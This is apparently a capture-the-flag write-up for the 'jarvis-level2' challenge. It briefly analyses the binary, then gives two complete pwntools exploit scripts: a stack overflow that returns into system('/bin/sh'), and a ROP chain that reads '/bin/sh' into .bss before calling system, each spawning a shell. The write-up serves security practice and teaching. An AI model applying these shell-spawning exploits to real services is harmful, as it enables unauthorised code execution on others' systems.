Keep Calm and Carry On

jarvis-level2

level2

0x01 Analysis

  1. Check the file type and the enabled protections; ASLR is not enabled.

  2. Look at the vulnerability in IDA. There is also a call to the system function, so check whether the string "/bin/sh" is present in the binary.

0x02 Exploitation approach

Method 1: set up a fake stack frame for system("/bin/sh")

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

# The ELF is needed for symbol lookups in both the local and remote case
elf = ELF('./level2')

flag = True
if flag:
    p = process(elf.path)
    # gdb.attach(p, 'b main')
else:
    host = '127.0.0.1'
    port = 8888
    p = remote(host, port)

binsh = elf.search("/bin/sh").next()   # address of the "/bin/sh" string in the binary
system = elf.plt['system']             # system@plt

# 0x88 bytes of buffer + 4 bytes of saved ebp, then the saved return address
# is overwritten with system@plt; 0xdeadbeef is the fake return address for
# system, and binsh is its first argument.
payload = 'A' * (0x88 + 0x4) + p32(system) + p32(0xdeadbeef) + p32(binsh)
p.recvline()
p.sendline(payload)
p.interactive()
```

Method 2: set up a fake stack frame for read and supply "/bin/sh" as input

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

# The ELF is needed for symbol lookups in both the local and remote case
elf = ELF('./level2')

flag = True
if flag:
    p = process(elf.path)
    # gdb.attach(p, 'b main')
else:
    host = '127.0.0.1'
    port = 8888
    p = remote(host, port)

bss = elf.bss() + 0x08        # writable location in .bss to store "/bin/sh"
pop3ret = 0x08048519          # pop; pop; pop; ret gadget, clears read's three arguments
system = elf.plt['system']
read = elf.plt['read']

# read(0, bss, 20): the final size argument 20 must be larger than the length of "/bin/sh"
read_args = p32(0) + p32(bss) + p32(20)

# 0x8c bytes of padding (0x88 buffer + 4 saved ebp), then: call read@plt, return into
# the pop3ret gadget (which removes read_args from the stack), then call system with a
# fake return address 0xdeadbeef and the bss pointer as its argument.
payload = 'A' * 0x8c + p32(read) + p32(pop3ret) + read_args + p32(system) + p32(0xdeadbeef) + p32(bss)
p.recvline()
p.sendline(payload)
p.sendline("/bin/sh\x00")     # consumed by the read() call into bss
p.interactive()
```